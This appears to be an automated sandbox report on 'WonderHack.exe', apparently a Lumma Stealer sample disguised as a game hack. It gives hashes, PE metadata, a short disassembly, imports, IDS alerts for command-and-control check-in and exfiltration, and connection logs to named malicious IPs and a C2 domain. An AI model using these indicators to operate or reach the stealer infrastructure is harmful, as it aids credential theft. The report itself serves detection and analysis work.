                                                                                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        sendypaster.xyzWave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.9
                                                                                                                                                                                                                                                                        steppriflej.xyzWave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.9
                                                                                                                                                                                                                                                                        steamcommunity.comLauncher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                                        LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                                        ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                                        Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EULauncher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.237.152.235
                                                                                                                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                        • 23.211.121.53
                                                                                                                                                                                                                                                                        nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 172.233.106.253
                                                                                                                                                                                                                                                                        nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 172.227.252.37
                                                                                                                                                                                                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                        • 23.215.103.199
                                                                                                                                                                                                                                                                        nsharm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 23.1.235.104
                                                                                                                                                                                                                                                                        nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 23.44.132.66
                                                                                                                                                                                                                                                                        http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • 172.235.158.251
                                                                                                                                                                                                                                                                        BITWEB-ASRUWave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.9
                                                                                                                                                                                                                                                                        https://mdgouv.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.14
                                                                                                                                                                                                                                                                        11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        11029977736728949.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        https://courtscali.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.14
                                                                                                                                                                                                                                                                        18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                                                                        • 193.143.1.231
                                                                                                                                                                                                                                                                        CLOUDFLARENETUSinstaller.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 172.67.164.25
                                                                                                                                                                                                                                                                        external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.19.35
                                                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.151.193
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.191.144
                                                                                                                                                                                                                                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.63.229
                                                                                                                                                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                        • 162.158.254.178
                                                                                                                                                                                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.18.182
                                                                                                                                                                                                                                                                        https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • 104.21.234.144
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8
                                                                                                                                                                                                                                                                        Entropy (8bit):3.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:OP5n:Ox
                                                                                                                                                                                                                                                                        MD5:32EB8D44A0938FBB8E8E87029CA719D8
                                                                                                                                                                                                                                                                        SHA1:13856311E78A959973D96B17544931AF22347E61
                                                                                                                                                                                                                                                                        SHA-256:C769F4AA36C38983F94D6F4599EE0A3623EC8D244969B9A1E4F4B91E86C0FF9F
                                                                                                                                                                                                                                                                        SHA-512:A6895D557270E69BE20349875587783B310B1B5A6922643FEA92875AD3D0899BB7B08F6F2206DE97194DA6DB9DDA1DC4AAE7759ED5684D18B36B9ECEDF0EAEDC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:Enjoy!..
                                                                                                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.527755098511334
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:WonderHack.exe
                                                                                                                                                                                                                                                                        File size:573'952 bytes
                                                                                                                                                                                                                                                                        MD5:65fc002ab58b0dc2e95e19b1f308a354
                                                                                                                                                                                                                                                                        SHA1:68ccb931b324d2988f0bad099dac28ae10dd7588
                                                                                                                                                                                                                                                                        SHA256:42c47b4221417b2f52c1e783e06d01401b8064a715eb88c54c8d00db8016a2ec
                                                                                                                                                                                                                                                                        SHA512:1cab1a0d47868c026a5cb8d4a3da1e266dba024cb88bf0baee5a018d54ce509f37179e1630ba9fdff6d770f7eb90e22614b35dd36a39c5e717cb1a1f601ae9a9
                                                                                                                                                                                                                                                                        SSDEEP:12288:DRIomkRJWzi7X+UeyZAnLoyNmOo4Lr0pfX4cR+c5JP:De/kRJWzib+UnALoyNmOo4LgdN+GJP
                                                                                                                                                                                                                                                                        TLSH:07C4D0017550C032DE6731B364AAD7AA862EFA200F636ACF97480DBDDF355D19A3172B
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.......................... .......l....@.....................................<..
                                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                        Entrypoint:0x4170bb
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:1f5f01fd52677b24724028ad24992aa9
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007F0B147F0A6Ah
                                                                                                                                                                                                                                                                        jmp 00007F0B147F08D9h
                                                                                                                                                                                                                                                                        mov ecx, dword ptr [00440700h]
                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                        mov edi, BB40E64Eh
                                                                                                                                                                                                                                                                        mov esi, FFFF0000h
                                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                                        je 00007F0B147F0A66h
                                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                                        jne 00007F0B147F0A88h
                                                                                                                                                                                                                                                                        call 00007F0B147F0A91h
                                                                                                                                                                                                                                                                        mov ecx, eax
                                                                                                                                                                                                                                                                        cmp ecx, edi
                                                                                                                                                                                                                                                                        jne 00007F0B147F0A69h
                                                                                                                                                                                                                                                                        mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                                        jmp 00007F0B147F0A70h
                                                                                                                                                                                                                                                                        test esi, ecx
                                                                                                                                                                                                                                                                        jne 00007F0B147F0A6Ch
                                                                                                                                                                                                                                                                        or eax, 00004711h
                                                                                                                                                                                                                                                                        shl eax, 10h
                                                                                                                                                                                                                                                                        or ecx, eax
                                                                                                                                                                                                                                                                        mov dword ptr [00440700h], ecx
                                                                                                                                                                                                                                                                        not ecx
                                                                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                                                                        mov dword ptr [00440740h], ecx
                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 14h
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                        xorps xmm0, xmm0
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                                        call dword ptr [0043D914h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        call dword ptr [0043D8CCh]
                                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        call dword ptr [0043D8C8h]
                                                                                                                                                                                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        call dword ptr [0043D964h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                        xor eax, ecx
                                                                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        mov eax, 00004000h
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push 00441E50h
                                                                                                                                                                                                                                                                        call dword ptr [0043D93Ch]
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push 00030000h
                                                                                                                                                                                                                                                                        push 00010000h
                                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                                        call 00007F0B147F8098h
                                                                                                                                                                                                                                                                        add esp, 0Ch
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d6b40x3c.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x910000x3e8.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x2324.reloc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x399680x18.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35cf80xc0.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x3d8600x170.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x326cc0x32800ccc71f71555262d04b28eeb13f33c694False0.5078125data6.449171689149143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0x340000xad9c0xae00265ca2e098c45dacae5fa86d5b3aa7cbFalse0.4167789152298851locale data table4.866718139159974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x3f0000x36180x260034a18fbac611bd450c331e8e8b0fc570False0.31270559210526316data5.125689677633356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .tls0x430000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .reloc0x440000x23240x2400a5356144ed5fdf31d774488bfaa21264False0.7392578125data6.496424389763303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .bss0x470000x496000x49600e87986d7cde0072f41d6ecee3edb590fFalse1.000336057282794OpenPGP Secret Key7.999431134473286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc0x910000x3e80x40064acc37535b725263869df252fd47b49False0.43359375data3.281274144562883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_VERSION0x910580x390dataEnglishUnited States0.4517543859649123
                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                                        USER32.dllDefWindowProcW
                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-23T00:48:02.275654+01002058212ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)1192.168.2.4540731.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T00:48:34.217069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730193.143.1.9443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:06.217277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737193.143.1.9443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:09.290585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44976023.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:10.056462+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44976023.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:11.733313+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449765104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:12.482826+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449765104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:12.482826+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449765104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:13.815665+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449771104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:14.582391+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449771104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:14.582391+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449771104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:16.153911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449777104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:17.087529+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449777104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:18.401160+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449784104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:20.953353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449793104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:23.663286+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449800104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:26.284170+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449806104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T00:49:30.201674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449817104.21.66.86443TCP
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.734030962 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.734076023 CET44349730193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.734174013 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.736915112 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:02.736931086 CET44349730193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.217068911 CET49730443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.443051100 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.443126917 CET44349737193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.443217993 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.443582058 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:48:34.443614960 CET44349737193.143.1.9192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:06.217277050 CET49737443192.168.2.4193.143.1.9
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.886631012 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.886708021 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.886818886 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.887151003 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:07.887186050 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.290340900 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.290585041 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.292335987 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.292350054 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.292699099 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.339071989 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:09.379380941 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056622982 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056684971 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056725979 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056744099 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056833982 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056891918 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056891918 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056936979 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.056979895 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.057075977 CET49760443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.233875036 CET4434976023.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                        Dec 23, 2024 00:49:10.233941078 CET4434976023.55.153.106192.168.2.4
